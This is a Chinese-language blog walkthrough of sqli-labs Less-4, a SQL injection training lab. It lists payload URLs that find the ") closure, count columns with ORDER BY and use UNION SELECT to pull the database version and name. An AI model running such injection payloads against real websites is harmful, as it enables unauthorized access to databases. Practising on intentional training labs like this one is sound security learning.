SQL注入靶场sqli-labs less-4

sqli-labs靶场第三关less-4

1、确定注入点

http://192.168.128.3/sq/Less-4/?id=1

http://192.168.128.3/sq/Less-4/?id=2

有不同回显,判断可能存在注入,

2、判断注入类型

输入

http://192.168.128.3/sq/less-4/?id=1 and 1=1

http://192.168.128.3/sq/less-4/?id=1 and 1=2

回显一致,猜测不是数字型注

加单引号

http://192.168.128.3/sq/less-4/?id=1'

没有回显,猜测其他闭合方式

输入双引号

http://192.168.128.3/sq/Less-4/?id=1"

报出错误

由结果判断闭合方式为 ")

3、确定列数

http://192.168.128.3/sq/less-4/?id=1") order by 5 --+

http://192.168.128.3/sq/less-4/?id=1") order by 4 --+

http://192.168.128.3/sq/less-4/?id=1") order by 3 --+

4,5回显报错,3的时候回显

确定列数为3

4、确定回显位

http://192.168.128.3/sq/less-4/?id=-1") union select 1,2,3 --+

确定2,3为回显位置

5、确定数据库名,数据库版本

http://192.168.128.3/sq/Less-4/?id=-1") union select 1,version(),database()--+

5、爆出数据库名,表名,列名,数据

最终得到数据

大功告成

相关推荐
Mr.1313 分钟前
数据库的三范式是什么?
数据库
Cachel wood19 分钟前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
Python之栈27 分钟前
【无标题】
数据库·python·mysql
虹科数字化与AR36 分钟前
安宝特应用 | 美国OSHA扩展Vuzix AR眼镜应用,强化劳动安全与效率
安全·ar·远程协助
风_流沙39 分钟前
java 对ElasticSearch数据库操作封装工具类(对你是否适用嘞)
java·数据库·elasticsearch
亽仒凣凣1 小时前
Windows安装Redis图文教程
数据库·windows·redis
亦世凡华、1 小时前
MySQL--》如何在MySQL中打造高效优化索引
数据库·经验分享·mysql·索引·性能分析
Hacker_Fuchen1 小时前
天融信网络架构安全实践
网络·安全·架构
YashanDB1 小时前
【YashanDB知识库】Mybatis-Plus调用YashanDB怎么设置分页
数据库·yashandb·崖山数据库
炫彩@之星1 小时前
Windows和Linux安全配置和加固
linux·windows·安全·系统安全配置和加固